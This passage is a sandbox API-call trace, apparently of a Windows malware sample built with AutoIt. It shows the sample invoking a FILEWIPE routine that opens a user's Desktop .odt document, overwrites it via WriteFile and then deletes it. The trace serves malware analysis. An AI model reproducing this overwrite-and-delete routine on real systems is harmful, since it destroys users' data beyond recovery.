dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0029.642] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0029.642] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0029.642] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.642] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0029.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0029.642] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.643] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0029.643] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.643] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.643] FreeLibrary (hLibModule=0x754b0000) returned 1 [0029.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0029.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0029.643] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0029.643] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.643] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.644] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.644] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.645] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.645] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0029.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0029.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.645] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.645] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.645] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb00416f0, ftCreationTime.dwHighDateTime=0x1d5c1bf, ftLastAccessTime.dwLowDateTime=0x337bc90, ftLastAccessTime.dwHighDateTime=0x1d5b870, ftLastWriteTime.dwLowDateTime=0x337bc90, ftLastWriteTime.dwHighDateTime=0x1d5b870, nFileSizeHigh=0x0, nFileSizeLow=0x5df2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="8IMSMp9nDKOk.odt", cAlternateFileName="8IMSMP~1.ODT")) returned 0x7c2100 [0029.645] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0029.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0029.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.645] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.645] CharLowerBuffW (in: lpsz="byte[24050]", cchLength=0xb | out: lpsz="byte[24050]") returned 0xb [0029.646] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.646] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0029.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.646] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.646] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0029.646] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0029.646] FreeLibrary (hLibModule=0x76b40000) returned 1 [0029.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0029.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0029.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0029.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0029.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0029.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0029.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.647] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.647] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0029.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.648] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.648] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.648] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0029.648] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.648] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8imsmp9ndkok.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0029.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0029.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0029.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0029.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0029.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0029.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0029.648] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.648] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0029.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.648] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0029.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.648] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0029.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0029.648] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0029.649] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.649] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0029.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88c790 [0029.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88c790, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0029.649] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.649] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0029.649] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0029.649] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0029.650] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0029.650] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0029.650] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.650] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.650] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0029.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0029.650] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.650] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.651] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0029.651] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0029.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0029.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0029.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.651] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt", lpFilePart=0x0) returned 0x36 [0029.651] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb00416f0, ftCreationTime.dwHighDateTime=0x1d5c1bf, ftLastAccessTime.dwLowDateTime=0x337bc90, ftLastAccessTime.dwHighDateTime=0x1d5b870, ftLastWriteTime.dwLowDateTime=0x118f5480, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x5df2, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="8IMSMp9nDKOk.odt", cAlternateFileName="8IMSMP~1.ODT")) returned 0x7c2100 [0029.651] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8IMSMp9nDKOk.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8imsmp9ndkok.odt")) returned 1 [0029.653] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb00416f0, ftCreationTime.dwHighDateTime=0x1d5c1bf, ftLastAccessTime.dwLowDateTime=0x337bc90, ftLastAccessTime.dwHighDateTime=0x1d5b870, ftLastWriteTime.dwLowDateTime=0x118f5480, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x5df2, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="8IMSMp9nDKOk.odt", cAlternateFileName="8IMSMP~1.ODT")) returned 0 [0029.654] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0029.654] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.654] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0029.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0029.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0029.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0029.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.655] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.655] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0029.655] RtlAllocateHeap 